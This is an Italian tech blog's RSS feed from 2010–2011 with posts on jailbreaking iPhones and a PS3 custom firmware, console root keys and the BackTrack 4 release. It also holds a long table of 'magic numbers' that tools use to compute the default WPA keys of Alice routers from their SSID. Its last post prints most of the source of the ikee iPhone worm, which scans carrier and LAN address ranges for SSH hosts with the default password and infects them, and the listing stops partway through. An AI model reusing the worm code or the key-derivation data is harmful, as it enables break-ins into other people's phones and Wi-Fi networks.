PcExpert » crack http://www.pcexpert-blog.com Sat, 05 Nov 2011 22:20:26 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 http://www.pcexpert-blog.com http://www.pcexpert-blog.com/wp-content/plugins/favicon-manager/favicon.ico PcExpert Guida per sbloccare la versione di facebook per iPad nascosta all’interno della versione per iPhone http://www.pcexpert-blog.com/2011/07/guida-per-sbloccare-la-versione-di-facebook-per-ipad-nascosta-allinterno-della-versione-per-iphone.html http://www.pcexpert-blog.com/2011/07/guida-per-sbloccare-la-versione-di-facebook-per-ipad-nascosta-allinterno-della-versione-per-iphone.html#comments Mon, 25 Jul 2011 12:12:32 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1769

Mc Sigler ha scoperto che in realtà, la versione di facebook per iPad, è ben nascosta all’interno della versione iPhone. Occorrono infatti pochi semplici passaggi per sbloccarla ed essa

]]>

Mc Sigler ha scoperto che in realtà, la versione di facebook per iPad, è ben nascosta all’interno della versione iPhone. Occorrono infatti pochi semplici passaggi per sbloccarla ed essa risulta già molto stabile è ben fatta. Non sono noti però i motivi per cui questa nuovissima e tanto attesa novità sia stata tenuta segreta. Sta di fatto che attraverso la versione creata ad hoc per iPad possiamo ora accedere a tutte le funzioni del social network, chat compresa.

Ecco quindi una semplice guida per “sbloccare” la versione iPad di facebook che ricordo può essere momentaneamente abilitata solo su iPad Jailbroken.

  1. Per prima cosa scarichiamo dall’Apple Store la versione iPhone di Facebook.
  2. Tramite iFile rechiamoci nella seguente cartella /var/mobile/Applications/Facebook. NOTA BENE:  per trovarla più facilmente, attivate nelle preferenze di iFile la voce Nomi applicazioni altrimenti vedrete solo una serie di numeri e lettere al posto della cartella Facebook.
  3. Apriamo il file Info.plist con il Visualizzatore Testo integrato in iFile.
  4. Scorriamo il file fino in fondo alla ricerca della stringa<key>UIDeviceFamily</key><array><integer>1</integer></array>

    e sostituiamo il numero 1 con il numero 2 per rendere la versione di facebook compatibile con iPad.

  5. Riavviamo infine il dispositivo.

UPDATE: Facebook ha disabilitato l’accesso tramite l’app per iPad e, a quanto pare, a Palo Alto sembrano non aver digerito la scoperta si questa versione apposita di facebook per il tablet di casa Apple. Tuttavia tramite un tweak gratuito scaricabile da cydia chiamato FaceForward è possibile riabilitare l’accesso a facebook tramite l’applicazione per iPad.

]]> http://www.pcexpert-blog.com/2011/07/guida-per-sbloccare-la-versione-di-facebook-per-ipad-nascosta-allinterno-della-versione-per-iphone.html/feed 0 GeoHot rilascia il suo primo custom firmware 3.55 per PS3. Guida all’installazione http://www.pcexpert-blog.com/2011/01/geohot-rilascia-il-suo-primo-custom-firmware-3-55-per-ps3.html http://www.pcexpert-blog.com/2011/01/geohot-rilascia-il-suo-primo-custom-firmware-3-55-per-ps3.html#comments Sun, 09 Jan 2011 10:53:04 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1709 Dopo averci mostrato qualche giorno fa il funzionamento, GeoHot rilascia a sorpresa il suo primo custom firmware 3.55 per PlayStation 3. Questo custom firmware può essere installato solo ed

]]>
Dopo averci mostrato qualche giorno fa il funzionamento, GeoHot rilascia a sorpresa il suo primo custom firmware 3.55 per PlayStation 3.
Questo custom firmware può essere installato solo ed esclusivamente sulle ps3 che montano il fw ufficiale 3.55. Le caratteristiche del cfw di Geohot sono molto simili a quelle del cfw di Kakaroto:

è possibile infatti installare ed eseguire PGK firmati e non sono supportati i manager per l’avvio dei backup dei giochi.

Attraverso il suo blog, Geohot ci comunica inoltre che, a breve,  rilascerà i tool make_self_npdrm e package_finalize che permetteranno di signare i propri homebrew ed annuncia anche che ci saranno parecchie novità in arrivo.

Ecco una semplice guida per installare il cf di Geohot che, è possibile installare come se fosse un normale update. A fine articolo tutti i link per i vari download.

  • Aggiornare la ps3 al firmware 3.55.
  • Estraiamo dall’archivio jailbreak.zip il file PS3UPDAT.PUP e inseriamolo in una chiavetta USB all’interno della cartella PS3\UPDATE. (Creiamola qualora non esistesse)
  • Facciamo ora partire dalla ps3 il normale procedimento di aggiornamento software.
  • Infine scarichiamo e avviamo dalla consolle il file test.pkg per verificare che la nostra ps3 è stata jailbrekkata con successo.

Vi lascio infine con un video che mostra il cfw di Geohot in azione e con tutti i link al download.

Download Jailbreak.zip

Download Test.pkg

]]> http://www.pcexpert-blog.com/2011/01/geohot-rilascia-il-suo-primo-custom-firmware-3-55-per-ps3.html/feed 5 Playstation 3 (PS3) e Playstation Portable (PSP) diventano le prime due console Open Source della storia grazie alla scoperta delle Root Key http://www.pcexpert-blog.com/2011/01/playstation-3-ps3-e-playstation-portable-psp-diventano-le-prime-due-console-open-source-della-storia-grazie-alla-scoperta-delle-root-key.html http://www.pcexpert-blog.com/2011/01/playstation-3-ps3-e-playstation-portable-psp-diventano-le-prime-due-console-open-source-della-storia-grazie-alla-scoperta-delle-root-key.html#comments Mon, 03 Jan 2011 20:20:19 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1706

Il noto George Hotz (aka GeoHot) ha iniziato l’anno alla grande rilasciando la Root Key della ancora quasi invulnerabile PlayStation 3. A distanza di poche ora inoltre Mathieulh ex-collaboratore

]]>

Il noto George Hotz (aka GeoHot) ha iniziato l’anno alla grande rilasciando la Root Key della ancora quasi invulnerabile PlayStation 3. A distanza di poche ora inoltre Mathieulh ex-collaboratore del famoso Dark_Alex, noto hacker sulla scena PSP, attraverso la chiave rilasciata da GeoHot, è riuscito a scovare anche la RootKey della PSP. Tutto ciò significa che, grazie a queste chiavi, saremo in grado di eseguire sulle due console di casa Sony qualsiasi applicazione non ufficiale direttamente dal firmware originale e senza quindi alcuna modifica e/o modchip.

Come si può facilmente comprendere le conseguenze di questo hack sono inimmaginabili. I custom firmware, le migliaia di programmi homebrew scritti in questi anni sono ormai obsoleti di fronte alla possibilità di semplicemente avviare software non ufficiale su hardware e software pulito ossia senza alcuna mod.
Attraverso queste chiavi non solo viene messo a nudo l’intero sistema operativo delle due consolle. Inoltre attraverso il rilascio di nuovi firmware Sony difficilmente potrà rendere nuovamente invulnerabili i due devices.

Ecco il link alla pagina originale di GeoHotz dove l’hacker ha pubblicato la RootKey della PS3. LINK

]]> http://www.pcexpert-blog.com/2011/01/playstation-3-ps3-e-playstation-portable-psp-diventano-le-prime-due-console-open-source-della-storia-grazie-alla-scoperta-delle-root-key.html/feed 0 Lista Aggiornata dei Magic Numbers (Numeri Magici) usati per calcolare automaticamente la chiave WPA dei router Alice http://www.pcexpert-blog.com/2010/09/lista-aggiornata-dei-magic-numbers-numeri-magici-usati-per-calcolare-automaticamente-la-chiave-wpa-dei-router-alice.html http://www.pcexpert-blog.com/2010/09/lista-aggiornata-dei-magic-numbers-numeri-magici-usati-per-calcolare-automaticamente-la-chiave-wpa-dei-router-alice.html#comments Thu, 16 Sep 2010 20:14:28 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1670

Dopo la recente scoperta da parte del White Hats Crew dell’algoritmo usato per generare automaticamente le chiavi WPA dei router Alice ecco che in rete sono comparsi numerossissimi tools

]]>

Dopo la recente scoperta da parte del White Hats Crew dell’algoritmo usato per generare automaticamente le chiavi WPA dei router Alice ecco che in rete sono comparsi numerossissimi tools atti a tale scopo(WPA Security Inspector, Agpf Tool) .

In particolare, partendo dall SSID della rete (il nome che visualizziamo non appena cerchiamo la nostra rete) si può ricavare, nel giro di pochi secondi, la fatidica chiave WPA.

Tutti questi tools hanno però bisogno di un particolare file (config.txt) di configurazione per generare le chiavi contente dei codici soprannominati Magic Numbers.

Cosa sono i Magic Numbers?

Seriali, Serie e Numeri Magici

Sono particolari cifre che cambiano da router a router secondo un particolare meccanismo che abbiamo dedotto, li abbiamo denominati numeri magici (altri modelli di router usano un formato analogo per i seriali ma non è chiaro se rispettano lo stesso meccanismo di generazione)

Ogni router oltre ad avere un proprio firmware ha anche una serie, corrispondente alla prima parte del seriale (SN) riportato su ogni router. Da un’accurata analisi del tutto statistica siamo riusciti a trarre alcune conclusioni in merito solo per alcune serie. Siamo però convinti che deve esistere un algoritmo universale in grado di individuarli tutti. Non essendo il nostro interese di natura statistica abbiamo limitato le nostre ricerche sui dati a cui abbiamo avuto la possibilità di analizzare.

Riprendendo il discorso dei numeri magici siamo riusciti, tramite confronti tra due o più seriali, ad individuare dei valori costanti che si ripeteno. Il seriale è calcolabile mediante un’equazione tutto sommato abbastanza semplice  conoscendo solamente la parte numerica dell’SSID della rete. E’ stato infatti scoperto che la relazione che sussiste tra SN e SSID è di aritmetica modulare: esistono due costanti, che definiremo con  k e Q, dipendenti dalla serie del router, tale che SSID=k*SN+Q (dove con SN indicheremo la seconda parte del seriale, quella dopo la X, la prima parte è fissa per ogni serie), da questa formula ricaviamo la formula finale SN=(SSID-Q)/k. Naturalmente un’equazione e due incognite non ammette un’unica soluzione, per questo abbiamo impostant un sistema che prende in considerazione i dati di due router della stessa serie.

Ecco di seguito una lista dei Magic Numbers aggiornata al 21/09/2010 (Settembre)


995,69102,13,99208960,001D8B
966,69102,13,96214846,001D8B
965,69102,13,96214846,001D8B
964,67902,13,95026672,001D8B
964,69102,13,96214846,001D8B
963,67902,13,95026672,001D8B
962,67902,13,95027335,001D8B
961,69102,13,96017051,001D8B
960,69102,13,96017051,001D8B
959,69102,13,94828422,001D8B
959,67902,13,94828422,001D8B
958,67902,13,94829072,001D8B
957,67902,13,94831022,001D8B
956,67902,13,94831022,001D8B
955,67902,13,94828422,001D8B
954,67902,13,94831022,001D8B
954,67902,13,94828422,001D8B
953,67902,13,94829137,001D8B
952,67902,13,94829137,001D8B
951,67902,13,94829137,001D8B
950,67902,13,94831022,001D8B
950,67902,13,94830515,001D8B
949,67902,13,94830515,001D8B
948,67902,13,94830515,001D8B
946,67901,13,92873664,001D8B
945,67901,13,92873664,001D8B
944,67901,13,92873664,001D8B
943,67901,13,92873664,001D8B
938,69101,13,91472696,001D8B
936,69101,13,92723407,001D8B
935,69101,13,92727307,001D8B
934,67901,13,92016972,001D8B
933,69101,13,92016972,001D8B
933,67901,13,92016972,001D8B
932,69101,13,93062432,001D8B
932,67901,13,92016972,001D8B
931,69101,13,92398366,001D8B
930,69101,13,92437366,001D8B
928,69101,13,92294366,001D8B
928,69101,13,92303856,001D8B
927,69101,13,92303856,001D8B
925,69101,13,92086899,001D8B
923,69101,13,92017687,001D8B
922,67901,13,91105594,001D8B
866,67901,13,85548341,001D8B
865,67901,13,85548341,001D8B
864,67901,13,85548341,001D8B
863,67901,13,85548341,001D8B
862,67901,13,85548341,001D8B
861,67901,13,85535341,001D8B
860,67901,13,85535341,001D8B
859,67901,13,85535341,001D8B
858,67901,13,85518805,001D8B
857,67901,13,85518805,001D8B
857,69101,13,85507196,001D8B
829,67901,13,82777468,38229D
653,67904,8,62415297,002553
652,67904,8,62415297,002553
651,67904,8,62415297,002553
650,67904,8,62415297,002553
650,67904,8,62415249,002553
649,67904,8,62415249,002553
649,67904,8,62415297,002553
648,67904,8,62415297,002553
647,67904,8,62415297,002553
646,67904,8,62415297,002553
645,67904,8,62415297,002553
644,67904,8,62415297,002553
643,67904,8,62415297,002553
642,69104,8,63703777,002553
641,67904,8,62254897,002553
641,69104,8,63703777,002553
640,67904,8,62254897,002553
639,67904,8,62254897,002553
638,67904,8,62254897,002553
637,67904,8,62246897,002553
636,67904,8,62246897,002553
636,67904,8,55226258,002553
636,67904,8,62360145,002553
635,67904,8,62230897,002553
634,67904,8,62239057,002553
634,67904,8,62238897,002553
633,67904,8,62239057,002553
633,69104,8,62903297,002553
631,67904,8,62194697,002553
631,67904,8,62219249,002553
631,67904,8,62193097,002553
630,67904,8,62220849,002553
629,67904,8,62304689,002553
629,67904,8,62220849,002553
628,67904,8,62174513,002553
627,67904,8,61855721,002553
627,69104,8,62345169,002553
627,67904,8,62174801,002553
626,69104,8,62345169,002553
626,67904,8,62345169,002553
625,69104,8,62345169,002553
624,69104,8,62345153,002553
623,67904,8,61884537,002553
622,67904,8,61884537,002553
62X,67904,8,62174801,002553
588,69102,13,56695373,002233
587,69102,13,56695945,002233
586,69102,13,56695945,002233
585,67902,13,55485918,002233
584,67902,13,55485918,002233
583,67902,13,55485918,002233
582,67902,13,55485918,002233
581,69102,13,56332816,002233
580,69102,13,56332816,002233
579,69102,13,56332816,002233
579,67902,13,55509708,002233
578,67902,13,55119942,002233
577,67902,13,55119942,002233
576,67902,13,55119942,002233
574,69102,13,55844913,002233
574,69102,13,55844900,002233
573,69102,13,55844913,002233
571,67902,13,54791692,002233
571,69102,13,55844900,002233
570,67902,13,54791692,002233
569,67902,13,54809242,002233
569,67902,13,54805992,002233
568,67902,13,54805992,002233
568,67902,13,54809242,002233
567,67902,13,54808800,002233
566,67902,13,54808800,002233
565,67902,13,54808800,002233
564,67902,13,54808800,002233
563,67902,13,54808800,002233
562,67902,13,54808800,002233
561,69102,13,55052472,002233
560,67902,13,54809242,002233
559,69102,13,54778588,00223
558,69102,13,54811868,00223
557,69102,13,54811868,00223
556,69102,13,54811868,00223
555,67904,8,55164449,002553
555,69102,13,54811868,00223
555,67904,8,55164145,002553
554,69102,13,54811868,002233
554,67904,8,55164450,002553
554,67904,8,55164449,002553
553,67904,8,55164449,002553
552,67904,8,55164449,002553
552,69102,13,54730124,002553
551,67904,8,55164449,002553
551,67903,8,52420697,002553
550,67903,8,52420697,002553
550,67903,8,52420689,002553
549,67903,8,52420689,002553
549,67903,8,52420673,002553
548,67903,8,52420689,002553
548,67903,8,52420673,002553
547,67903,8,52420689,002553
546,67903,8,52420689,002553
545,67903,8,52420689,002553
544,67903,8,52420689,002553
543,67903,8,52420689,002553
542,67903,8,52420673,002553
542,67903,8,52420689,002553
541,67903,8,52420689,002553
540,67903,8,52420689,002553
539,67903,8,52420689,002553
539,67903,8,52420681,002553
538,67903,8,52420681,002553
537,67903,8,52420681,002553
536,67903,8,52420689,002553
536,67903,8,52420681,002553
535,67903,8,52420681,002553
535,67903,8,52420689,002553
534,67903,8,52420681,002553
533,67903,8,52420689,002553
533,67903,8,52420681,002553
532,69103,8,52845953,002553
531,69103,8,52845953,002553
530,67903,8,52196329,002553
529,67903,8,52196329,002553
528,67903,8,52196329,002553
527,67903,8,52196329,002553
526,69103,8,52418353,002553
526,67903,8,52196329,002553
525,69103,8,52418353,002553
524,69103,8,52418353,002553
490,69101,13,48968681,001CA2
487,67901,13,48559740,00238E
487,67901,13,48559740,001CA2
483,67903,8,47896103,00238E
482,67903,8,47896103,00238E
481,67903,8,47896103,00238E
480,67903,8,47896103,00238E
479,67903,8,47955247,00238E
478,69102,13,43892099,00238E
477,69102,13,43892099,00238E
476,69102,13,43892099,00238E
476,69102,13,43892021,00238E
475,69102,13,43892021,00238E
474,69102,13,43892099,00238E
472,67902,13,39177168,00238E
471,67902,13,39177168,00238E
471,67902,13,39184782,00238E
470,67902,13,39184782,00238E
470,67902,13,38678445,00238E
469,67902,13,38678445,00238E
468,67902,13,39014716,00238E
468,67902,13,38678445,00238E
466,67902,13,39015145,00238E
465,67902,13,39015145,00238E
465,67902,13,39015065,00238E
464,67902,13,39014716,00238E
463,67902,13,39014716,00238E
463,67902,13,39015145,00238E
462,67902,13,39011245,00238E
461,67902,13,39014716,00238E
461,67902,13,39015145,00238E
460,67902,13,39015145,00238E
460,67902,13,39010595,00238E
459,67902,13,39004095,00238E
459,67902,13,39015145,00238E
458,67902,13,39010595,0017CE
457,67902,13,39010595,00238E
456,67902,13,39010595,00238E
455,67902,13,39010595,00238E
454,67902,13,39010335,00238E
453,67902,13,39010335,00238E
451,67902,13,39010335,00238E
450,69102,13,41631044,00238E
449,67902,13,38883455,00238E
448,67902,13,38883455,00238E
447,67902,13,38883455,00238E
446,67902,13,38767105,00238E
445,67902,13,38767105,00238E
445,67902,13,39010335,00238E
444,67902,13,38767105,00238E
443,67901,13,43008155,00238E
443,67902,13,38767105,00238E
44X,67902,13,44156697,00238E
430,67901,13,43008155,00238E
430,67901,13,43008155,001CA2
427,69101,13,42667449,001CA2
423,69101,13,42309436,001CA2
390,67902,13,33775765,00238E
390,69102,13,35639029,00238E
389,67902,13,33775765,00238E
388,67902,13,33775765,00238E
387,69102,13,35639029,00238E
386,69102,13,35639029,00238E
385,69102,13,35639029,00238E
385,67902,13,33042526,00238E
384,67902,13,33042526,00238E
383,69102,13,35639029,00238E
382,69102,13,35639029,00238E
382,67902,13,33175048,00238E
381,67902,13,33175048,00238E
380,67902,13,33172097,00238E
379,67902,13,33175048,00238E
379,67902,13,33175058,00238E
378,67902,13,33175048,00238E
377,67902,13,33175048,00238E
377,67902,13,33175058,00238E
376,67902,13,33175048,00238E
375,67902,13,33175048,00238E
375,67902,13,33175058,00238E
375,67902,13,33175048,00238E
374,67902,13,34856728,00238E
373,67902,13,34856728,00238E
372,69102,13,34855688,00238E
372,69102,13,34856728,00238E
371,69102,13,34856728,00238E
370,69102,13,34855688,00238E
369,67902,13,32716668,00238E
368,67902,13,32719840,00238E
367,67902,13,32720035,00238E
366,67902,13,32720035,00238E
365,67902,13,32720035,00238E
364,67902,13,32720035,00238E
363,67902,13,32720035,00238E
362,67902,13,32720035,00238E
361,67902,13,32720035,00238E
360,67902,13,32720035,00238E
360,67902,13,32719866,00238E
359,67902,13,32719866,38229D
321,67904,8,28730779,38229D
320,69104,8,30891307,38229D
315,67904,8,28369051,38229D
314,67904,8,28369051,38229D
312,69104,8,30599079,38229D
312,69104,8,30655015,38229D
312,67904,8,28190287,38229D
182,67904,8,16628398,00268D ( NON CORRETTO ??? )
181,67902,13,17728255,00268D
181,67902,13,14496838,00268D
181,67902,13,13921842,00268D
181,67902,13,14825009,00268D
181,67903,8,15966400,00268D
181,69102,13,16493373,00268D
181,69102,13,15539710,00268D
181,69103,8,17946128,00268D
181,67901,13,16874837,00268D
181,67902,13,17122778,00268D
181,67902,13,12103992,00268D
181,69102,13,16313301,00268D
181,67904,8,17574389,00268D
181,67904,8,18042064,00268D
181,69102,13,17315130,00268D
181,67902,13,15578953,00268D

]]> http://www.pcexpert-blog.com/2010/09/lista-aggiornata-dei-magic-numbers-numeri-magici-usati-per-calcolare-automaticamente-la-chiave-wpa-dei-router-alice.html/feed 61 Rilasciato redsn0w 0.9.5 BETA per effettuare il Jailbreak dell’iPhone OS 4 Beta 1 per iPhone 3G!! [MAC] http://www.pcexpert-blog.com/2010/04/rilasciato-redsn0w-0-9-5-beta-per-effettuare-il-jailbreak-dell%e2%80%99iphone-os-4-beta-1-per-iphone-3g-mac.html http://www.pcexpert-blog.com/2010/04/rilasciato-redsn0w-0-9-5-beta-per-effettuare-il-jailbreak-dell%e2%80%99iphone-os-4-beta-1-per-iphone-3g-mac.html#comments Fri, 16 Apr 2010 05:29:27 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1650

Avete proprio letto bene, il Dev Team ha appena rilasciato la prima beta di redsn0w 0.9.5 per il Jailbreak del nuovo sistema operativo presentato da Apple solo qualche giorno

]]>

Avete proprio letto bene, il Dev Team ha appena rilasciato la prima beta di redsn0w 0.9.5 per il Jailbreak del nuovo sistema operativo presentato da Apple solo qualche giorno fa: l’iPhone OS 4.

E quindi ci siamo. Già qualche giorno fa il grande GeoHot, ma anche il team iH8sn0w, ci aveva mostrato con screens e video su YouTube, com’era già possibile effettuare il Jailbreak del nuovo firmware di casa Apple. Ma il Dev Team, a sorpresa, stupisce tutti con questa prima beta che, almeno per il momento, è ancora limitata e poco funzionale; ma soprattutto non è per gli utilizzatori finali MA SOLO PER DEVELOPERS che sviluppano apps per Cydia:

redsn0w 0.9.5 infatti è compatibile, per il momento, solo con:

  • iPhone 3G
  • Mac OSX
  • iPhone OS 4

Ecco come effettuare il jailbreak:

  • Lanciate redsn0w 0.9.5
  • Selezionate il firmware “iPhone1,2_4.0_8A230m_Restore.ipsw” (lo stesso che avete usato per l’aggiornamento del vostro iPhone 3G)
  • Selezionate “Install Cydia” e cliccate su “Next”. Entrate in DFU per fare il Jailbreak.
  • Quando l’iPhone si riaccende, avrete Cydia installato con un’icona bianca. Inoltre Cydia non avrà repo: andate in Sources ed inserite questa repo -> apt.saurik.com/cydia-3.7 (fregatevene di tutti gli errori che vedrete). Al riavvio di Cydia vedrete la classica icona e le repository standard pronte all’uso.

Download

Fonte

]]> http://www.pcexpert-blog.com/2010/04/rilasciato-redsn0w-0-9-5-beta-per-effettuare-il-jailbreak-dell%e2%80%99iphone-os-4-beta-1-per-iphone-3g-mac.html/feed 0 Rilasciata la versione finale di Backtrack 4.0 nome in codice “pwnsauce” http://www.pcexpert-blog.com/2010/01/rilasciata-la-versione-finale-di-backtrack-4-0-nome-in-codice-pwnsauce.html http://www.pcexpert-blog.com/2010/01/rilasciata-la-versione-finale-di-backtrack-4-0-nome-in-codice-pwnsauce.html#comments Tue, 12 Jan 2010 13:10:36 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1565

Finalmente, a circa un anno dalla beta, è stata rilasciata la versione finale di Backtrack 4.0 che, a detta degli sviluppatori, è la migliore release mai rilasciata finora. Questa

]]>

Finalmente, a circa un anno dalla beta, è stata rilasciata la versione finale di Backtrack 4.0 che, a detta degli sviluppatori, è la migliore release mai rilasciata finora. Questa nuova versione di backtrack include infatti un nuovo kernel, tantissimi nuovi tool di cui alcuni presenti solo ed esclusivamente nella distro e tantissimi bugfixes relativi a tutti i problemi noti finora agli sviluppatori.

Per il rilascio di backtrack 4.0 è stata inoltre creata una sezione specifica all’interno della quale è possibile ottenere numerose guide e suggerimenti per installare e usare al meglio la nota distro di penetration testing.
Nel momento un cui scrivo purtroppo l’home che era stata dedicata alla distro è completamente down per gli innumerevoli download!

Tuttavia ecco il link da cui scaricare la distro (anche in versione per VMware) non appena il server tornerà a funzionare correttamente.

Download Backtrack 4.0

]]> http://www.pcexpert-blog.com/2010/01/rilasciata-la-versione-finale-di-backtrack-4-0-nome-in-codice-pwnsauce.html/feed 0 Codice sorgente di ikee il primo worm per iPhone http://www.pcexpert-blog.com/2010/01/codice-sorgente-di-ikee-il-primo-worm-per-iphone.html http://www.pcexpert-blog.com/2010/01/codice-sorgente-di-ikee-il-primo-worm-per-iphone.html#comments Tue, 05 Jan 2010 16:52:15 +0000 Paolo Smedile http://www.pcexpert-blog.com/?p=1558

Tutti ricorderanno ikee, il worm che aveva come target tutti gli iPhone sui quali era stato eseguito il jailbreak e dove non era stata cambiata la password di default

]]>

Tutti ricorderanno ikee, il worm che aveva come target tutti gli iPhone sui quali era stato eseguito il jailbreak e dove non era stata cambiata la password di default (“alpine“) dopo l’installazione di SSH. Il worm aveva come unico scopo quello di modificare il wallpaper scelto dall’utente con una immagine che ritraeva Rick Astley e di cercare altri dispositivi iPhone vulnerabili da infettare. Ecco di seguito il codice sorgente:

//
// iPhone default pass worm  by ikex
//
// This code is CLOSED source.
// And very hacky, i just needed it to work.
//
// Thanks to alan3423432432 haha for helping me work out my flaws in C
//

#include "main.h"

int fdlock;

// randHost():  Returns a random IP Address XXX.XXX.XXX.XXX
char *randHost(void)
{
    int x,y,z;
    char *retme;
    srand (time (0));
    x=random() % 255;
    y=random() % 255;
    z=random() % 255;
    asprintf(&retme, "%i.%i.%i.", x,y,z);
    return retme;
}

// get_lock():  Sets/Gets the status of the file lock
//              located in /var/lock/bbot.lock
int get_lock(void)
{
    struct flock fl;
    fl.l_type = F_WRLCK;
    fl.l_whence = SEEK_SET;
    fl.l_start = 0;
    fl.l_len = 1;
    if((fdlock = open("/var/lock/bbot.lock", O_WRONLY|O_CREAT, 0666)) == -1)
      return 0;
    if(fcntl(fdlock, F_SETLK, &fl) == -1)
      return 0;
    return 1;
}

// getAddrRange():  Gets the phones 3G range + 2
//                  eg, 100.100.100.0-100.100.102.255
char *getAddrRange()
{
   struct ifaddrs *ifaddr, *ifa;
   int family, s;
   char host[NI_MAXHOST];
   if (getifaddrs(&ifaddr) == -1) {
       perror("getifaddrs");
       exit(EXIT_FAILURE);
   }
   for (ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) {
       family = ifa->ifa_addr->sa_family;
        if (family == AF_INET)
        {
           if (family == AF_INET || family == AF_INET6) {
               s = getnameinfo(ifa->ifa_addr,
                       (family == AF_INET) ? sizeof(struct sockaddr_in) :
                                             sizeof(struct sockaddr_in6),
                       host, NI_MAXHOST, NULL, 0, NI_NUMERICHOST);
               if (s != 0) {
                   printf("getnameinfo() failed: %s\n", gai_strerror(s));
                   return "0.0.0.0-0.0.0.0";
               }

               if (strcmp(ifa->ifa_name, "pdp_ip0") == 0)
               {
                   syslog(LOG_DEBUG, ifa->ifa_name);
                   syslog(LOG_DEBUG, host);
                   char *wee[20];
                   tokenise(host, wee, ".");
                   char *range;
                   int octc = atoi(wee[2]);
                   asprintf(&range, "%s.%s.%i.0-%s.%s.%i.255", wee[0], wee[1], octc, wee[0], wee[1], octc+2);
                   return range;
                }
           }
        }
   }
   freeifaddrs(ifaddr);
   return "0.0.0.0-0.0.0.0";
}
// From alan2349024  Sorry i suck at remembering numbers
// Thanks dude!
int tokenise (char input[], char *token[], char* spl) // Added sep param
{
    char *tokens;
    int count = 0;

    tokens = strtok(input, spl);//Change TOKEN_SEPERATORS To What You Want To Seperate Off

    if(tokens[strlen(tokens) - 1] == '\n')
        tokens[strlen(tokens) - 1] = '\0';

    token[count] = tokens;

    while(tokens != NULL)
    {
        count++;
        if( count > MAX_NUM )//change MAX_NUM_TOKENS To A Number
            return (-1);

        tokens = strtok(NULL, spl);

        if(tokens != NULL)
        {
            if(tokens[strlen(tokens) - 1] == '\n')
                tokens[strlen(tokens) - 1] = '\0';
        }
        token[count] = tokens;
    }
    return count;
}

// Entry point.
int main(int argc, char *argv[])
{

    //pid_t   pid, sid;
    //char *subnet = randHost();

    // syslog(LOG_DEBUG, "I should go, i feel like im interupting something ;]");
    /* // FORK CODE REMOVED IT FUCKS WITH LaunchDaemon.
    pid = fork();
    if (pid < 0)
            exit(EXIT_FAILURE);
      else if (pid > 0)
            exit(EXIT_SUCCESS);

    umask(0);

    sid = setsid();
    */
    if(get_lock() == 0) {
        syslog(LOG_DEBUG, "I know when im not wanted *sniff*");
        return 1; } // Already running.
    sleep(60); // Lets wait for the network to come up 2 MINS
    syslog(LOG_DEBUG, "IIIIIII Just want to tell you how im feeling");
    //char ipRange[256] = "120.16.0.0-120.23.255.255";
    char *locRanges = getAddrRange();
    char *lanRanges = "192.168.0.0-192.168.255.255"; // #172.16.0.0-172.31.255.255 Ehh who uses it
    char *vodRanges1 = "202.81.64.0-202.81.79.255";
    char *vodRanges2 = "23.98.128.0-123.98.143.255";
    char *vodRanges3 = "120.16.0.0-120.23.255.255";
    char *optRanges1 = "114.72.0.0-114.75.255.255";
    char *optRanges2 = "203.2.75.0-203.2.75.255";
    char *optRanges3 = "210.49.0.0-210.49.255.255";
    char *optRanges4 = "203.17.140.0-203.17.140.255";
    char *optRanges5 = "203.17.138.0-203.17.138.255";
    char *optRanges6 = "211.28.0.0-211.31.255.255";
    char *telRanges = "58.160.0.0-58.175.255.25";
    //char *attRanges = "32.0.0.0-32.255.255.255"; // TOO BIG

    syslog(LOG_DEBUG, "awoadqdoqjdqjwiodjqoi aaah!");
    ChangeOnBoot();
    KillSSHD();
    // Local first
    while (1)
    {
        syslog(LOG_DEBUG, "Checking out the local scene yo");
        scanner(locRanges);
        syslog(LOG_DEBUG, "Random baby");
        int i;
        for (i=0; i <= 2; i++)
        {
            char *ipaddr = randHost();
            char *rrange;
            asprintf(&rrange, "%s.0-%s.255", ipaddr, ipaddr);
            scanner(rrange);
        }
        // Lan
        syslog(LOG_DEBUG, "Lannnnn");
        scanner(lanRanges);
        syslog(LOG_DEBUG, "VODAPHONE");
        scanner(vodRanges1);
        scanner(vodRanges2);
        scanner(vodRanges3);
        syslog(LOG_DEBUG, "OPTUSSSS");
        scanner(optRanges1);
        scanner(optRanges2);
        scanner(optRanges3);
        scanner(optRanges4);
        scanner(optRanges5);
        scanner(optRanges6);
        syslog(LOG_DEBUG, "Telstra");
        scanner(telRanges);
    }
}

void scanner(char *ipRange)
{
    char *wee[10];
    char *begin[10];
    char *end[10];
    tokenise(ipRange, wee, "-");
    int octaB, octaE, octbB, octbE, octcB, octcE;
    tokenise(wee[0], begin, ".");
    tokenise(wee[1], end, ".");
    octaB = atoi(begin[0]); // YYY.XXX.XXX.XXX
    octaE = atoi(end[0]);
    octbB = atoi(begin[1]);
    octbE = atoi(end[1]);
    octcB = atoi(begin[2]);
    octcE = atoi(end[2]);
    int loop1;
    for (loop1=octaB; loop1<=octaE; loop1++)
    {
        int loop2;
        for (loop2=octbB; loop2<=octbE; loop2++)
        {
            int loop3;
            for (loop3=octcB; loop3<=octcE; loop3++)
            {
                int loop4;
                for (loop4=0; loop4<=255; loop4++)
                {
                    char* host;
                    asprintf(&host, "%i.%i.%i.%i", loop1, loop2,loop3, loop4);
                    //printf("\n\rScanning: %s", host);
                    if (scanHost(host) == 0 && checkHost(host) == 0) // This will run scanHost THEN checkHost right?
                    {
                        syslog(LOG_DEBUG, "Oh a sheep!");
                        //printf("\n\r - %s is vulnerable", host);
                        infectHost(host);
                    }
                }
            }
        }
    }
}

// http://img41.imageshack.us/img41/730/asto.jpg
int scanHost(char* host)
{
    int res, valopt, soc;
    struct sockaddr_in addr;
    long arg;
    fd_set myset;
    struct timeval tv;
    socklen_t lon;
    soc = socket(AF_INET, SOCK_STREAM, 0);
    arg = fcntl(soc, F_GETFL, NULL);
    arg |= O_NONBLOCK;
    fcntl(soc, F_SETFL, arg);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(22);
    addr.sin_addr.s_addr = inet_addr(host);
    res = connect(soc, (struct sockaddr *)&addr, sizeof(addr));
    if (res < 0) {
      if (errno == EINPROGRESS) {
        tv.tv_sec = 10;
        tv.tv_usec = 0;
        FD_ZERO(&myset);
